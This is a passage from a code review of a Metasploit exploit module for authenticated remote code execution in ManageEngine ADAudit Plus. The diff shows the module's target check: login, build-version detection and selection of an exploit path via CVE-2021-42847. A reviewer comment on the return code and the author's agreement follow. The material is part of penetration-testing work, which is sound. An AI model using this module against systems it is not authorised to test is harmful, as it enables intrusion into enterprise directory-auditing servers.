modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,597 @@
+      vprint_status(domain_alias_msg)
+      @domain_alias = domain_aliases.first
+      print_status("Using configured authentication domain alias #{@domain_alias}.")
+    else
+      # this means the user provided an authentication domain that isn't actually configured on the target, so authentication cannot succeed
+      print_status(domain_alias_msg)
+      return CheckCode::Detected("The provided AUTH_DOMAIN #{auth_domain} does not match the configured authentication domain(s).")
+    end
+
+    print_status("Attempting to authenticate to #{auth_domain} with username: #{username} and password: #{password}")
+    login_results = adaudit_plus_login(auth_domain, username, password, false)
+    login_msg = login_results['message']
+    case login_results['status']
+    when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+      return CheckCode::Unknown(login_msg)
+    when adaudit_plus_status::NO_ACCESS, NO_DOMAINS
+      # if we cannot authenticate, we can't create an alert profile so exploitation is impossible
+      # if no domains are configured, we cannot trigger the payload and therefore exploitation is impossible
+      return CheckCode::Safe(login_msg)
+    when adaudit_plus_status::SUCCESS
+      @domain = login_results['configured_domains'].first
+      vprint_status("Using domain #{@domain} for the name of the directory we will be creating")
+    end
+
+    print_good('Successfully authenticated')
+    @adapcsrf_cookie = login_results['adapcsrf_cookie']
+
+    # check the build version to see if we can actually exploit the target
+    build_results = adaudit_plus_grab_build(@adapcsrf_cookie)
+    build_msg = build_results['message']
+    unless build_results['status'] == adaudit_plus_status::SUCCESS
+      # if we don't get a valid build number, we don't know what the target is, so we can't proceed
+      # however, we can also not say that the target is safe or detected, so we return Unknown
+      return CheckCode::Unknown(build_msg)
+    end
+
+    build_version = build_results['build_version']
+    if build_version < Rex::Version.new('7004')
+      @exploit_method = 'default'
+      return CheckCode::Appears("The target is ADAudit Plus #{build_version}")
+    end
+
+    # For builds 7004 and 7005 exploitation will still be possible via CVE-2021-42847 if the vulnerable endpoint exists
+    if build_version < Rex::Version.new('7006')
+      gpo_watcher_status = gpo_watcher_data_check
+      case gpo_watcher_status
+      when adaudit_plus_status::SUCCESS
+        @exploit_method = 'cve_2021_42847'
+        return CheckCode::Appears("The target is ADAudit Plus #{build_version} and the endpoint for CVE-2021-42847 exists.")
+      when adaudit_plus_status::CONNECTION_FAILED
+        return CheckCode::Unknown("The target is ADAudit Plus #{build_version} but the connection failed when checking for the CVE-2021-42847 endpoint")
```

Comment:
Should this not be `CheckCode::Detected` as you know the service, aka ADAudit Plus, is running but you don't know if the vulnerable endpoint is available or not?

Reply:
agreed and fixed